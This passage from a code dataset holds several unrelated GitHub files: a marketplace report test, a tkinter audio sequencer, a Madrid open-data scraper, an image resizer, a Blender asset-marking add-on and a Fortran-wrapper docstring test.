value=1),\n GLParam(param_id=206, value=2),\n GLParam(param_id=206, value=3),\n ],\n ),\n Offer(\n title='papers',\n hid=102,\n hyperid=601,\n glparams=[\n GLParam(param_id=206, value=1),\n GLParam(param_id=207, value=1),\n GLParam(param_id=207, value=2),\n GLParam(param_id=207, value=3),\n GLParam(param_id=207, value=4),\n ],\n ),\n ]\n\n cls.index.models += [Model(title='shoes', hid=102, hyperid=601)]\n\n def test_value_order(self):\n \"\"\"\n Проверяем порядок следования значений параметров:\n он должен совпадать с порядком по-возрастанию позиций значений параметра (см. выше)\n Одного запроса в прайм достаточно, т.к. логика в репорте работает одна и та же\n \"\"\"\n response = self.report.request_json('place=prime&text=shoes&hid=102')\n self.assertFragmentIn(\n response,\n {\n 'units': [\n {\n 'values': [\n {'unit': 'INT', 'value': 'XS', 'id': '5'},\n {'unit': 'INT', 'value': 'M', 'id': '8'},\n {'unit': 'INT', 'value': 'L', 'id': '7'},\n {'unit': 'INT', 'value': 'XL', 'id': '6'},\n ],\n 'unitId': 'INT',\n 'id': '1',\n },\n {\n 'values': [\n {'unit': 'ROMAN', 'value': 'I', 'id': '9'},\n {'unit': 'ROMAN', 'value': 'V', 'id': '11'},\n {'unit': 'ROMAN', 'value': 'IC', 'id': '10'},\n {'unit': 'ROMAN', 'value': 'C', 'id': '12'},\n ],\n 'unitId': 'ROMAN',\n 'id': '2',\n },\n ]\n },\n preserve_order=True,\n )\n\n def test_value_without_position_fallback(self):\n \"\"\"\n Проверяем порядок следования значений параметров:\n он должен быть в алфавитном порядке, т.к. у значения ddd нет параметра position\n \"\"\"\n response = self.report.request_json('place=prime&text=papers&hid=102')\n self.assertFragmentIn(\n response,\n {\n 'units': [\n {\n 'values': [\n {'unit': 'TEXT', 'value': 'aaa', 'id': '1'},\n {'unit': 'TEXT', 'value': 'bbb', 'id': '2'},\n {'unit': 'TEXT', 'value': 'ccc', 'id': '3'},\n {'unit': 'TEXT', 'value': 'ddd', 'id': '4'},\n ],\n 'unitId': 'TEXT',\n 'id': '3',\n }\n ]\n },\n preserve_order=True,\n )\n\n def test_value_without_position_fallback_popular_filters_exp(self):\n \"\"\"\n Проверяем, что эксперимент market_popular_gl_filters_on_search=1 не сломал размеры (то же, что test_value_without_position_fallback)\n \"\"\"\n response = self.report.request_json(\n 'place=prime&text=papers&hid=102&rearr-factors=market_popular_gl_filters_on_search=1'\n )\n self.assertFragmentIn(\n response,\n {\n 'units': [\n {\n 'values': [\n {'unit': 'TEXT', 'value': 'aaa', 'id': '1'},\n {'unit': 'TEXT', 'value': 'bbb', 'id': '2'},\n {'unit': 'TEXT', 'value': 'ccc', 'id': '3'},\n {'unit': 'TEXT', 'value': 'ddd', 'id': '4'},\n ],\n 'unitId': 'TEXT',\n 'id': '3',\n }\n ]\n },\n preserve_order=True,\n )\n\n @classmethod\n def prepare_original_params(cls):\n \"\"\"\n Создаем русскую размерную сетку с двумя значениями размеров: 32 и 34 и интернациональную с XL\n Создаем оффер с размерами 32 и 34, и с оригинальными значениями 32 и XL\n Создаем оффер с размерами 32 и 34 и без оригинальных значений.\n \"\"\"\n cls.index.gltypes += [\n GLType(\n param_id=210,\n hid=103,\n gltype=GLType.ENUM,\n subtype='size',\n cluster_filter=True,\n unit_param_id=211,\n name='size',\n values=[\n GLValue(value_id=1, text='32', unit_value_id=2),\n GLValue(value_id=2, text='34', unit_value_id=2),\n GLValue(value_id=3, text='XL', unit_value_id=3),\n ],\n ),\n GLType(\n param_id=211,\n hid=103,\n gltype=GLType.ENUM,\n name='size_units',\n position=None,\n values=[\n GLValue(value_id=2, text='RU', default=True),\n GLValue(value_id=3, text='INT'),\n ],\n ),\n ]\n\n cls.index.offers += [\n Offer(\n title='with-originals',\n hid=103,\n 
vclusterid=1000000003,\n glparams=[\n GLParam(param_id=210, value=1),\n GLParam(param_id=210, value=2),\n ],\n original_glparams=[GLParam(param_id=210, value=1), GLParam(param_id=210, value=3)],\n ),\n Offer(\n title='without-originals',\n hid=103,\n vclusterid=1000000003,\n glparams=[\n GLParam(param_id=210, value=1),\n GLParam(param_id=210, value=3),\n ],\n ),\n ]\n\n cls.index.vclusters += [VCluster(title='pants', hid=103, vclusterid=1000000003)]\n\n cls.settings.is_archive_new_format = True\n\n def test_original_params(self):\n \"\"\"\n Проверяем, что в выдаче присутствует информация об оригинальном размере (32 и XL) у оффера с оригинальными\n значениями, и что оригинальных значений не показывается у оффера без оригинальных значений.\n Выдача экспериментальная, т.е. не обсуждаемая с фронтом и имеет цель, что репорт МОЖЕТ пробросить\n оригинальный размер\n \"\"\"\n response = self.report.request_json('place=productoffers&hid=103&hyperid=1000000003')\n self.assertFragmentIn(\n response,\n [\n {\n 'entity': 'offer',\n 'titles': {\n 'raw': \"with-originals\",\n },\n 'experimentalOriginalParams': [{'param': 'size', 'value': '32'}, {'param': 'size', 'value': 'XL'}],\n },\n {\n 'entity': 'offer',\n 'titles': {\n 'raw': \"without-originals\",\n },\n 'experimentalOriginalParams': Absent(),\n },\n ],\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_sizes_new.py","file_name":"test_sizes_new.py","file_ext":"py","file_size_in_byte":21684,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7810909269","text":"import wave\nimport pyaudio\nfrom tkinter import *\nimport time\n\n#number of possible sounds, rows*cols\nrows = 10\ncols = 10\nSoundMatrix = []\n# This function defines the limits for the tempo used (a value above 200 simply does not make a difference)\ndef limit_bpms(* args):\n\tglobal bpms\n\tprint(bpms.get())\n\tif int(bpms.get()) < 20:\n\t\tbpms.set(20)\n\tif int(bpms.get()) > 200:\n\t\tbpms.set(200)\n\n# This funciton is the main one for playing the sound loop.\n# It is kinda strangly written, but what it does is take a background sound, and take all the sounds selected (stored in the argument path)\n# Then for each chunk of each sound play it sequencial (this is done to mix the sounds without using a bunch load of threads, also threads and tkinter do not combine very well in my experience)\ndef playsound(path,a):\n\t#define stream chunk \n\tchunk = 1024\n\tstream = []\n\treadable = []\n\tfor i in path:\n\t\tnew = str(i)+\".wav\"\n\t\t#open a wav format music \n\t\tf = wave.open(new,\"rb\") \n\t\t#instantiate PyAudio \n\t\tp = pyaudio.PyAudio() \n\t\t#open stream \n\t\tstream.append(p.open(format = p.get_format_from_width(f.getsampwidth()), \n\t\t channels = f.getnchannels(), \n\t\t rate = f.getframerate(), \n\t\t output = True))\n\t\treadable.append(f)\n\n\tbackground = \"beat.wav\"\n\tb = wave.open(background,\"rb\")\n\tp = pyaudio.PyAudio()\n\tbackstream = p.open(format = p.get_format_from_width(b.getsampwidth()),\n\t\t\t\t\tchannels = b.getnchannels(),\n\t\t\t\t\trate = b.getframerate(),\n\t\t\t\t\toutput = True)\n\taux = readable[0].readframes(chunk)\n\tstream[0].write(aux)\n\tcounter = 0\n\tnow = time.time()\n\tstart = now\n\twhile aux:\n\t\ta.update_idletasks()\n\t\ta.update()\n\t\t#check for a minute/bpms have passed\n\t\tif (now-start) >= 60/bpms.get():\n\t\t\tbreak\n\t\tmetronome = 
b.readframes(chunk)\n\t\tbackstream.write(metronome)\n\t\tfor i in readable:\n\t\t\taux = i.readframes(chunk)\n\t\t\tstream[counter].write(aux)\n\t\t\tcounter += 1\n\t\tcounter=0\n\t\tnow = time.time()\n\n\tfor s in stream:\n\t\t#stop streams \n\t\ts.stop_stream() \n\t\ts.close() \n\n\tbackstream.stop_stream()\n\tbackstream.close()\n\t#close PyAudio \n\tp.terminate() \n\n# This function is activated with the right click and will replace the current sound of the clicked button for a new one\n# This function does not terminate the recording, only when the mouse is released the stoprecording is called\ndef recordingsound():\n\tglobal audio,frames, stream\n\tFORMAT = pyaudio.paInt16\n\tCHANNELS = 2\n\tRATE = 44100\n\tCHUNK = 1024\n\tRECORD_SECONDS = 0.5\n\t \n\taudio = pyaudio.PyAudio()\n\t \n\t# start Recording\n\tstream = audio.open(format=FORMAT, channels=CHANNELS,\n\t rate=RATE, input=True,\n\t frames_per_buffer=CHUNK)\n\tprint(\"recording...\")\n\tframes = []\n\t \n\tfor i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n\t data = stream.read(CHUNK)\n\t frames.append(data)\n\n# This function will terminate the recording of given button\n# only the argument b is used (the button id), argument e is just to catch the event Object\ndef stoprecording(e,b):\n\tglobal audio,frames,stream\n\tFORMAT = pyaudio.paInt16\n\tCHANNELS = 2\n\tRATE = 44100\n\tCHUNK = 1024\n\tRECORD_SECONDS = 5\n\tWAVE_OUTPUT_FILENAME = str(b)+\".wav\"\n\t \n\tprint(\"finished recording\")\n\t \n\t \n\t# stop Recording\n\tstream.stop_stream()\n\tstream.close()\n\taudio.terminate()\n\t \n\twaveFile = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n\twaveFile.setnchannels(CHANNELS)\n\twaveFile.setsampwidth(audio.get_sample_size(FORMAT))\n\twaveFile.setframerate(RATE)\n\twaveFile.writeframes(b''.join(frames))\n\twaveFile.close()\n\n#function to check which buttons are activated (the ones with a red background)\ndef convertMatrixtosound():\n\tglobal SoundMatrix\n\tplaying = []\n\tcounter = 0\n\tfor a in SoundMatrix:\n\t\tif a[\"highlightbackground\"] == 'red':\n\t\t\tplaying.append(counter)\n\t\tcounter += 1\n\treturn playing\n\n#function to toggle each buttons color (deactivate - blue, activate - red).\n#This function also enables the starting button\ndef loadsound(row,col):\n\tglobal cols, SoundMatrix, starting_but\n\n\tif SoundMatrix[row*cols+col].config()[\"highlightbackground\"][4] == 'blue':\n\t\tSoundMatrix[row*cols+col].config(highlightbackground=\"red\")\n\t\tstarting_but.config(state=\"active\")\n\telse:\n\t\tSoundMatrix[row*cols+col].config(highlightbackground=\"blue\")\n\n# this function will be triggered every time the \"start making music\" button is clicked.\n# It only receives the argument \"app\" to later on pass to the \"playsound()\" function (its pretty dumb I know, it was to avoid excessive global variables (which there are already plenty of) )\n# Flag is to start/stop the loop\ndef loadsoundmatrix(app):\n\tglobal bpms, starting_but,flag\n\tif starting_but.cget(\"text\") != \"Stop the loop!\":\n\t\tstarting_but.config(text=\"Stop the loop!\",state=\"active\")\n\t\tflag = 0\n\telse:\n\t\tflag = 1\n\twhile flag == 0:\n\t\tsounds=convertMatrixtosound()\n\t\tprint(sounds)\n\t\tplaysound(sounds,app)\n\tstarting_but.config(text=\"Start making music!\",state=\"active\")\n\n#Main function\n#Defines all the graphical components through tkinter\n#Binds all the sound buttons to the previously defined functions\ndef main():\n\tglobal rows, cols, SoundMatrix,starting_but, bpms,flag\n\tflag = 0\n\troot = Tk()\n\tw, h = 
root.winfo_screenwidth(), root.winfo_screenheight()\n\troot.title(\"Sound table\")\n\tmainframe = Frame(root)\n\tmainframe.pack(fill=\"both\", expand=1)\n\tbpms = IntVar()\n\tbpms.set(60)\n\tLabel(mainframe, text=\"Welcome to the digital sound table!\",font='Helvetica 18 bold').pack()\n\tLabel(mainframe, text=\"\\nPlease select the tempo (bpms)\").pack()\n\tentry_bpms = Entry(mainframe, textvariable=bpms,width=5)\n\tentry_bpms.bind(\"<Return>\",limit_bpms)\n\tentry_bpms.pack()\n\tgridframe = Frame(root)\n\tfor r in range(0,rows):\n\t\tfor c in range(0,cols):\n\t\t\tbut = Button(gridframe,text=\"\\t\\n\\t\\n\",command = lambda ro=r,co=c: loadsound(ro,co),highlightbackground=\"blue\")\n\t\t\tbut.grid(row=r,column=c)\n\t\t\tbut.bind(\"<Button-3>\",lambda e: recordingsound())\n\t\t\tbut.bind(\"<ButtonRelease-3>\",lambda e,id_but=int(r*cols+c): stoprecording(e,id_but))\n\t\t\tSoundMatrix.append(but)\n\tgridframe.pack(fill=\"both\", expand=1)\n\ttimeframe = Frame(root)\n\tstarting_but = Button(timeframe, text=\"Start making music!\",command = lambda: loadsoundmatrix(root),state=\"disabled\")\n\tstarting_but.pack()\n\ttimeframe.pack(fill=\"both\", expand=1)\n\twhile True:\n\t\troot.update_idletasks()\n\t\troot.update()\n\n# Used so this script can be imported later on as module\nif __name__ == \"__main__\":\n\tmain()","repo_name":"henriquefig/Sound-table","sub_path":"soundtable.py","file_name":"soundtable.py","file_ext":"py","file_size_in_byte":6332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} {"seq_id":"42031394383","text":"#-*- coding=utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport wget\n\ninit = 'http://datos.madrid.es'\nurl = 'https://datos.madrid.es/portal/site/egob/menuitem.c05c1f754a33a9fbe4b2e4b284f1a5a0/?vgnextoid=bffff1d2a9fdb410VgnVCM2000000c205a0aRCRD&vgnextchannel=374512b9ace9f310VgnVCM100000171f5a0aRCRD&vgnextfmt=default'\npage = requests.get(url)\nprint(page.text)\n\nsoup = BeautifulSoup(page.text, 'html.parser')\n\nentradas = soup.find_all(class_='asociada-link ico-xlsx')\nprint(entradas)\n\nlink = entradas[0].get('href') # this returns the link for the most recent month\n\nexcel = init + link\nfilename = wget.download(excel, out='./excel/')\nprint(filename)\n\n\n\n\n\n\n","repo_name":"MadAlert/TFG","sub_path":"Python/WebScraping/obtenerExcel.py","file_name":"obtenerExcel.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"13514053499","text":"import glob\nimport pathlib \nfrom PIL import Image\nmainfolder = input(\"Input folder: \") \n\np = pathlib.Path(\"{}/\".format(mainfolder))\n\ndef compress(img_file):\n    print(img_file)\n    basewidth = 1920\n    img = Image.open(img_file)\n    wpercent = (basewidth/float(img.size[0]))\n    hsize = int((float(img.size[1])*float(wpercent)))\n    img = img.resize((basewidth,hsize), Image.ANTIALIAS)\n    img.save(img_file)\n\nfor img_file in p.rglob(\"*.png\"):\n    compress(img_file)\n\nfor img_file in p.rglob(\"*.jpg\"):\n    compress(img_file)\n\nfor img_file in p.rglob(\"*.jpeg\"):\n    compress(img_file)","repo_name":"manolaz/formal-image","sub_path":"photocomp.py","file_name":"photocomp.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"1563214615","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General 
Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nimport bpy\nimport os \nfrom subprocess import run\nfrom bpy.types import AddonPreferences, Operator, Panel\nfrom bpy.props import BoolProperty, StringProperty, EnumProperty, IntProperty\n\n\nbl_info = {\n \"name\": \"Asset Marker\",\n \"description\": \"Mark Assets in .blend files\",\n \"author\": \"Daniel Grauer\",\n \"version\": (1, 2, 5),\n \"blender\": (3, 0, 0),\n \"location\": \"Sidebar\",\n \"category\": \"System\",\n \"wiki_url\": \"https://github.com/kromar/blender_AssetMarker\",\n \"tracker_url\": \"https://github.com/kromar/blender_AssetMarker/issues\",\n}\n\n\ndef prefs():\n ''' load addon preferences to reference in code'''\n user_preferences = bpy.context.preferences\n return user_preferences.addons[__package__].preferences \n\n\nclass AM_PT_AssetMarker(Panel): \n bl_label = 'Asset Marker'\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = 'Asset Marker' \n\n def draw(self, context): \n current_file = prefs().current_file.replace(\",\", \" \").split()\n layout = self.layout \n for i in current_file: \n layout.operator(operator=\"scene.asset_marker\", text=i, icon='ASSET_MANAGER', emboss=True, depress=False).button_input=i\n layout.separator()\n\n\nclass AssetMarker(Operator):\n bl_idname = \"scene.asset_marker\"\n bl_label = \"asset_marker\"\n bl_description = \"mark assets\"\n \n button_input: StringProperty()\n \n asset_marked: BoolProperty(\n name=\"asset_marked\",\n description=\"asset_marked\",\n default=False)\n \n mesh_type: BoolProperty(\n name=\"mesh_type\",\n description=\"mesh_type\",\n default=False)\n\n\n def execute(self, context): \n #print(\"button_input: \", self.button_input)\n if self.asset_marked:\n self.asset_marked = False\n else:\n self.asset_marked = True \n self.mark_asset(self.asset_marked) \n\n return{'FINISHED'}\n \n\n def mark_asset(self, state = False): \n\n if self.button_input == 'Mark_Objects': \n for ob in bpy.data.objects:\n if state:\n self.mark_assets(ob) \n else:\n self.clear_assets(ob) \n elif self.button_input == 'Mark_Materials':\n for ob in bpy.data.materials:\n if state:\n self.mark_assets(ob) \n else:\n self.clear_assets(ob)\n elif self.button_input == 'Mark_Poses':\n for ob in bpy.data.actions:\n if state:\n self.mark_assets(ob) \n else:\n self.clear_assets(ob)\n elif self.button_input == 'Mark_Worlds':\n for ob in bpy.data.worlds:\n if state:\n self.mark_assets(ob) \n else:\n self.clear_assets(ob)\n\n \n def mark_assets(self, asset):\n if prefs().debug_mode:\n print(' marking: ', asset.name)\n asset.asset_mark() \n asset.asset_generate_preview()\n\n def clear_assets(self, asset):\n if prefs().debug_mode:\n print(' clearing: ', asset.name) \n asset.asset_clear()\n asset.use_fake_user = True\n \n \n \nclass AssetWalker(Operator):\n bl_idname = \"scene.asset_walker\"\n bl_label = \"Mark Assets\"\n bl_description = \"mark library assets\"\n \n blender_path = bpy.app.binary_path\n 
addon_path = os.path.abspath(os.path.dirname(__file__))\n script_path = os.path.join(addon_path, 'mark_assets.py') \n \n button_input: StringProperty() \n library_index: IntProperty()\n\n def execute(self, context): \n print(\"\\nRun Asset Crawler\")\n self.asset_crawler(context) \n return{'FINISHED'}\n\n def convert_args_to_cmdlist(self):\n arg_list = []\n if prefs().mark_objects:\n arg_list.append('mark_object') \n \n if prefs().mark_mesh:\n arg_list.append('mark_mesh')\n else: \n arg_list.append('clear_mesh')\n if prefs().mark_surface:\n arg_list.append('mark_surface')\n else: \n arg_list.append('clear_surface')\n if prefs().mark_meta:\n arg_list.append('mark_meta')\n else: \n arg_list.append('clear_meta')\n if prefs().mark_curve:\n arg_list.append('mark_curve')\n else: \n arg_list.append('clear_curve')\n if prefs().mark_font:\n arg_list.append('mark_font')\n else: \n arg_list.append('clear_font')\n if prefs().mark_curves:\n arg_list.append('mark_curves')\n else: \n arg_list.append('clear_curves')\n if prefs().mark_pointcloud:\n arg_list.append('mark_pointcloud')\n else: \n arg_list.append('clear_pointcloud')\n if prefs().mark_volume:\n arg_list.append('mark_volume')\n else: \n arg_list.append('clear_volume')\n if prefs().mark_greasepencil:\n arg_list.append('mark_greasepencil')\n else: \n arg_list.append('clear_greasepencil')\n if prefs().mark_armature:\n arg_list.append('mark_armature')\n else: \n arg_list.append('clear_armature')\n if prefs().mark_lattice:\n arg_list.append('mark_lattice')\n else: \n arg_list.append('clear_lattice')\n if prefs().mark_empty:\n arg_list.append('mark_empty')\n else: \n arg_list.append('clear_empty')\n if prefs().mark_light:\n arg_list.append('mark_light')\n else: \n arg_list.append('clear_light')\n if prefs().mark_lightprobe:\n arg_list.append('mark_lightprobe')\n else: \n arg_list.append('clear_lightprobe')\n if prefs().mark_camera:\n arg_list.append('mark_camera')\n else: \n arg_list.append('clear_camera')\n if prefs().mark_speaker:\n arg_list.append('mark_speaker')\n else: \n arg_list.append('clear_speaker')\n\n else: \n arg_list.append('clear_object')\n\n\n if prefs().mark_materials:\n arg_list.append('materials_mark')\n else: \n arg_list.append('materials_clear')\n\n if prefs().mark_poses:\n arg_list.append('poses_mark')\n else: \n arg_list.append('poses_clear')\n\n if prefs().mark_worlds:\n arg_list.append('worlds_mark')\n else: \n arg_list.append('worlds_clear')\n\n asset_type = ' '.join([str(item) for item in arg_list])\n #print(arg_list)\n #print(asset_type)\n return asset_type\n\n\n def asset_crawler(self, context):\n # iterating over directory and subdirectory to find all blender files \n # and mark the desired assets\n\n asset_type = self.convert_args_to_cmdlist()\n\n paths = context.preferences.filepaths\n #print(\"Asset Library: \", paths.asset_libraries[self.library_index].name)\n lib_path = paths.asset_libraries[self.library_index].path\n\n for path, dirc, files in os.walk(lib_path): \n for name in files:\n if name.endswith('.blend'):\n try: \n blend_path = os.path.join(path, name)\n print(\"Opening Asset Library: \", blend_path) #0\n #\"\"\" \n run([self.blender_path, \n blend_path, \n '--background', \n '--factory-startup',\n '--python', \n self.script_path, \n '--', \n str(prefs().debug_mode), #0\n asset_type, #1\n ], shell=False) \n #\"\"\" \n \n except:\n print(\"cant open %s, file corrupt?\" % name) \n \n for window in bpy.context.window_manager.windows:\n screen = window.screen\n for area in screen.areas:\n if area.type == 
'FILE_BROWSER': \n #bpy.ops.asset.catalog_new(parent_path='')\n #bpy.ops.asset.library_refresh()\n pass\n #print(\"amount of files\", len(files)) \n\n \"\"\" \n progress_total = len(files)\n wm = bpy.context.window_manager\n wm.progress_begin(0, progress_total) \n for i in range(progress_total):\n wm.progress_update(i) \n print(i)\n wm.progress_end() \n #\"\"\"\n\n return{'FINISHED'}\n\n\nclass AssetMarkerPreferences(AddonPreferences):\n bl_idname = __package__\n \n current_file: StringProperty(\n name=\"current_file\", \n description=\"current_file\", \n subtype='NONE',\n default=\"Mark_Objects, Mark_Materials, Mark_Poses, Mark_Worlds\",\n update=AM_PT_AssetMarker.draw)\n\n mark_objects: bpy.props.BoolProperty(\n name=\"Objects\",\n description=\"All Objects will be marked as Assets\",\n default=True) \n \n custom_object_types: bpy.props.BoolProperty(\n name=\"Configure Object Types\",\n description=\"debug_mode\",\n default=False) \n\n mark_mesh: bpy.props.BoolProperty(\n name=\"Mesh\",\n description=\"All Meshes will be marked as Assets\",\n default=True) \n mark_surface: bpy.props.BoolProperty(\n name=\"Surface\",\n description=\"All Surfaces will be marked as Assets\",\n default=True) \n mark_meta: bpy.props.BoolProperty(\n name=\"Meta\",\n description=\"All Metas will be marked as Assets\",\n default=True) \n\n\n mark_curve: bpy.props.BoolProperty(\n name=\"Curve\",\n description=\"All Curves will be marked as Assets\",\n default=True) \n mark_font: bpy.props.BoolProperty(\n name=\"Font\",\n description=\"All Fonts will be marked as Assets\",\n default=True) \n mark_curves: bpy.props.BoolProperty(\n name=\"Curves\",\n description=\"All Curves will be marked as Assets\",\n default=True) \n mark_pointcloud: bpy.props.BoolProperty(\n name=\"Pointcloud\",\n description=\"All Pointclouds will be marked as Assets\",\n default=True) \n mark_volume: bpy.props.BoolProperty(\n name=\"Volume\",\n description=\"All Volumes will be marked as Assets\",\n default=True) \n mark_greasepencil: bpy.props.BoolProperty(\n name=\"Grease Pencil\",\n description=\"All Grease Pencils will be marked as Assets\",\n default=True) \n mark_armature: bpy.props.BoolProperty(\n name=\"Armatures\",\n description=\"All Armatures will be marked as Assets\",\n default=True) \n mark_lattice: bpy.props.BoolProperty(\n name=\"Lattice\",\n description=\"All Lattices will be marked as Assets\",\n default=True) \n mark_empty: bpy.props.BoolProperty(\n name=\"Empties\",\n description=\"All Empties will be marked as Assets\",\n default=True) \n mark_light: bpy.props.BoolProperty(\n name=\"Light\",\n description=\"All Lights will be marked as Assets\",\n default=True) \n mark_lightprobe: bpy.props.BoolProperty(\n name=\"Lightprobe\",\n description=\"All Lightprobes will be marked as Assets\",\n default=True) \n mark_camera: bpy.props.BoolProperty(\n name=\"Camera\",\n description=\"All Cameras will be marked as Assets\",\n default=True) \n mark_speaker: bpy.props.BoolProperty(\n name=\"Speaker\",\n description=\"All Speakers will be marked as Assets\",\n default=True) \n \n\n mark_materials: bpy.props.BoolProperty(\n name=\"Materials\",\n description=\"All Materials will be marked as Assets\",\n default=True) \n mark_poses: bpy.props.BoolProperty(\n name=\"Poses\",\n description=\"All Poses will be marked as Assets\",\n default=False) \n mark_worlds: bpy.props.BoolProperty(\n name=\"Worlds\",\n description=\"All Worlds will be marked as Assets\",\n default=False) \n \n debug_mode: bpy.props.BoolProperty(\n name=\"debug_mode\",\n 
description=\"debug_mode\",\n default=False) \n \n \n \n def draw(self, context):\n layout = self.layout\n layout.use_property_split = False \n layout.prop(self, 'debug_mode') \n \n #asset libraries\n paths = context.preferences.filepaths\n box = layout.box()\n row = box.row()\n box.label(text='Asset Libraries')\n split = box.split(factor=0.3)\n name_col = split.column()\n path_col = split.column()\n asset_col = split.column()\n\n row = name_col.row(align=True) # Padding\n row.separator()\n row.label(text=\"Name\")\n\n row = path_col.row(align=True) # Padding\n row.separator()\n row.label(text=\"Path\")\n\n row = asset_col.row(align=True) # Padding\n row.separator()\n row.label(text=\"Asset Marker\")\n\n for i, library in enumerate(paths.asset_libraries):\n name_col.prop(library, \"name\", text=\"\")\n row = path_col.row()\n row.prop(library, \"path\", text=\"\") \n row = asset_col.row() \n row.operator(operator=\"scene.asset_walker\", icon='ASSET_MANAGER', emboss=True, depress=False).library_index = i\n row.operator(\"preferences.asset_library_remove\", text=\"\", icon='TRASH', emboss=True).index = i\n \n row = box.row()\n row.alignment = 'LEFT'\n row.operator(\"preferences.asset_library_add\", text=\"\", icon='ADD', emboss=False)\n \n\n # Asset Marker selection\n box = layout.box() \n box.label(text='Asset Marker Configuration') \n col = box.column()\n split = col.split() \n col1 = split.column() \n col2 = split.column() \n col3 = split.column() \n\n col1.prop(self, 'mark_objects',icon = 'OBJECT_DATA')\n if self.mark_objects:\n col1.prop(self, 'custom_object_types')\n col1 = col1.column(align=True) \n if self.custom_object_types:\n col1.prop(self, 'mark_mesh',icon = 'OUTLINER_OB_MESH')\n col1.prop(self, 'mark_surface',icon = 'OUTLINER_OB_SURFACE')\n col1.prop(self, 'mark_meta',icon = 'OUTLINER_OB_META')\n col1.prop(self, 'mark_curve',icon = 'OUTLINER_OB_CURVE')\n col1.prop(self, 'mark_font',icon = 'OUTLINER_OB_FONT')\n if bpy.app.version >= (3,2,0):\n col1.prop(self, 'mark_curves',icon = 'OUTLINER_OB_CURVES')\n col1.prop(self, 'mark_pointcloud',icon = 'OUTLINER_OB_POINTCLOUD')\n col1.prop(self, 'mark_volume',icon = 'OUTLINER_OB_VOLUME')\n col1.prop(self, 'mark_greasepencil',icon = 'OUTLINER_OB_GREASEPENCIL')\n col1.prop(self, 'mark_armature',icon = 'OUTLINER_OB_ARMATURE')\n col1.prop(self, 'mark_lattice',icon = 'OUTLINER_OB_LATTICE')\n col1.prop(self, 'mark_empty',icon = 'OUTLINER_OB_EMPTY')\n col1.prop(self, 'mark_light',icon = 'OUTLINER_OB_LIGHT')\n col1.prop(self, 'mark_lightprobe',icon = 'OUTLINER_OB_LIGHTPROBE')\n col1.prop(self, 'mark_camera',icon = 'OUTLINER_OB_CAMERA')\n col1.prop(self, 'mark_speaker',icon = 'OUTLINER_OB_SPEAKER')\n \n col2.prop(self, 'mark_materials', icon = 'MATERIAL')\n col2.prop(self, 'mark_worlds', icon = 'WORLD')\n col3.prop(self, 'mark_poses', icon = 'POSE_HLT')\n\n #template_list(listtype_name, list_id, dataptr, propname, active_dataptr, active_propname, item_dyntip_propname='', rows=5, maxrows=5, type='DEFAULT', columns=9, sort_reverse=False, sort_lock=False)\n\n\n\nclasses = (\n AssetMarker,\n AssetWalker,\n AM_PT_AssetMarker,\n AssetMarkerPreferences,\n )\n\n\ndef register(): \n [bpy.utils.register_class(c) for c in classes]\n\n\ndef unregister():\n [bpy.utils.unregister_class(c) for c in classes]\n\n\nif __name__ == \"__main__\":\n 
register()\n","repo_name":"kromar/blender_AssetMarker","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":18117,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"37712136888","text":"import unittest\nimport re\n\nfrom pywrapper import m_circle\n\ncircle_radius = 1.5\nball_radius = 2.5\nsquare_size = 3.\nprecision = 1e-7\n\ndef clean_str(in_str):\n docstring_lines = in_str.split('\\n')\n for i,line in enumerate(docstring_lines):\n docstring_lines[i] = line.strip(' \\n\\t')\n docstring_lines[i] = re.sub('Defined at main\\\\.f90 lines \\\\d+-\\\\d+', '', docstring_lines[i])\n return '\\n'.join(docstring_lines)\n\nclass TestDocstring(unittest.TestCase):\n\n def test_module_doc(self):\n circle = m_circle.t_circle()\n docstring = m_circle.__doc__\n ref_docstring = \"\"\"\n Module m_circle\n\n\n Defined at main.f90 lines 7-89\n\n File: main.f90\n Brief: Test program docstring\n Author: test_author\n Copyright: test_copyright\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n def test_docstring(self):\n circle = m_circle.t_circle()\n docstring = m_circle.construct_circle.__doc__\n ref_docstring = \"\"\"\n construct_circle(self, radius)\n\n\n Defined at main.f90 lines 17-20\n\n Parameters\n ----------\n circle : T_Circle, [in,out] t_circle to initialize\n radius : float, [in] radius of the circle\n\n Brief: Initialize circle\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n def test_no_direction(self):\n circle = m_circle.t_circle()\n docstring = m_circle.no_direction.__doc__\n ref_docstring = \"\"\"\n no_direction(self, radius)\n\n\n Defined at main.f90 lines 28-31\n\n Parameters\n ----------\n circle : T_Circle, t_circle to initialize\n radius : float, radius of the circle\n\n Brief: Without direction\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n def test_docstring_incomplet(self):\n circle = m_circle.t_circle()\n docstring = m_circle.incomplete_doc_sub.__doc__\n ref_docstring = \"\"\"\n incomplete_doc_sub(self, radius)\n\n\n Defined at main.f90 lines 38-41\n\n Parameters\n ----------\n circle : T_Circle\n radius : float, [in] radius of the circle\n\n 